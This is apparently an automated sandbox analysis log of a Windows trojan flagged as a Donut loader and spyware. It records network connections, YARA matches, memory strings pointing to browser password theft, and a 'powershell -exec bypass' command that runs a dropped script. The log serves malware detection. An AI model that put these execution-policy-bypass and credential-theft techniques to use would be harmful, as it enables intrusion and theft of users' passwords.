              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownHTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49773 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49859 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.4:49865 version: TLS 1.2

              System Summary

              barindex
              Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007196010_3_00719601
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007194E80_3_007194E8
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007193EA0_3_007193EA
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007193CA0_3_007193CA
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007193BE0_3_007193BE
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0074460E0_3_0074460E
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0074460E0_3_0074460E
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0074460E0_3_0074460E
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_00739EEB0_3_00739EEB
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007094640_3_00709464
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0070B1A10_3_0070B1A1
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0074460E0_3_0074460E
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0074460E0_3_0074460E
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0074460E0_3_0074460E
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007196010_3_00719601
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007194E80_3_007194E8
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007193EA0_3_007193EA
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007193CA0_3_007193CA
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007193BE0_3_007193BE
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007196010_3_00719601
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007194E80_3_007194E8
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007193EA0_3_007193EA
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007193CA0_3_007193CA
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007193BE0_3_007193BE
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0074460E0_3_0074460E
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0074460E0_3_0074460E
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0074460E0_3_0074460E
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007196010_3_00719601
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007194E80_3_007194E8
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007193EA0_3_007193EA
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007193CA0_3_007193CA
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_007193BE0_3_007193BE
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeStatic PE information: invalid certificate
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000000.1713251005.000000000046A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametl_bench_cd.exe: vs #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1845092630.0000000002A6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenametl_bench_cd.exe: vs #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeBinary or memory string: OriginalFilenametl_bench_cd.exe: vs #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/4@2/2
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile created: C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1Jump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017544546.000000000375B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885801313.0000000003776000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeString found in binary or memory: /Address family not supported by protocol family
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeFile read: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe "C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe"
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1"Jump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeStatic file information: File size 79325044 > 1048576
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x136e00
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0071C57E push edi; retf 0_3_0071C591
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0071C57E push edi; retf 0_3_0071C591
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0071C57E push edi; retf 0_3_0071C591
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0071CB06 push edi; retf 0_3_0071CB08
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0071CB06 push edi; retf 0_3_0071CB08
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0071CB06 push edi; retf 0_3_0071CB08
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0071FFB8 push esi; retf 0_3_0071FFBB
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0071FFB8 push esi; retf 0_3_0071FFBB
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_00719C9D push FFFFFFC3h; ret 0_3_00719C9F
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0071AF8C push A8007176h; ret 0_3_0071AF91
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0071AF8C push A8007176h; ret 0_3_0071AF91
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0071AF8C push A8007176h; ret 0_3_0071AF91
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_00756B35 push eax; ret 0_3_00756B39
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_00756B35 push eax; ret 0_3_00756B39
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_00756B35 push eax; ret 0_3_00756B39
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0073C061 push edx; retf 0_3_0073C064
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0073BB6D push edi; retf 0_3_0073BB6E
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_00737BD7 pushad ; retf 0020h0_3_00737BDA
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0070EB71 push eax; iretd 0_3_0070EB72
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0070EB71 push eax; iretd 0_3_0070EB72
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0070EB71 push eax; iretd 0_3_0070EB72
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0070CA03 push 00000078h; retf 0_3_0070CA05
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0070CA03 push 00000078h; retf 0_3_0070CA05
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0070CEF7 push ds; retf 0_3_0070CEF8
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0070CEF7 push ds; retf 0_3_0070CEF8
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0070C7B7 push cs; iretd 0_3_0070C7B8
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_0070C7B7 push cs; iretd 0_3_0070C7B8
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeCode function: 0_3_00756B35 push eax; ret 0_3_00756B39
